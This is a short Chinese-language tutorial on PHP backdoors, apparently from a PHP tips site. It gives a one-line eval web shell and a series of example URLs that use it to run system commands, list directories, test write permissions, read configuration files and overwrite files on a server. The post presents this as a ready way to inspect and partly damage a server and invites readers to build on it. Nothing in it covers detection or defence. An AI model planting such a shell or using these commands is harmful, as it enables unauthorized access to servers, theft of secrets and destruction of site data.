PHP後門的一些用法

今天我們說一些最常見的PHP留後門的一些用法

#首先，寫一個最簡單的後門，也可以叫木馬。

<?php eval($_GET[&#39;evl&#39;]);

就這樣，你已經獲得了這台伺服器上的許多執行權限。

那場景的用法有哪些呢？

列印伺服器phpinfo

http://www.test.com/a.php?evl=phpinfo()

查看某個目錄下有什麼檔案

http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));

查看目錄是否可寫，接下裡就可以在可寫的目錄裡建立可執行檔了

http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));

取得某個檔案的內容，一般用來讀取設定

http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));

對某個可寫目錄進行寫檔

http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));

好了，以上基本上已經可以完成對一個伺服器的查看的部分破壞了，其他的功能就試著舉一反三吧。

以上是PHP後門的一些用法的詳細內容。更多資訊請關注PHP中文網其他相關文章！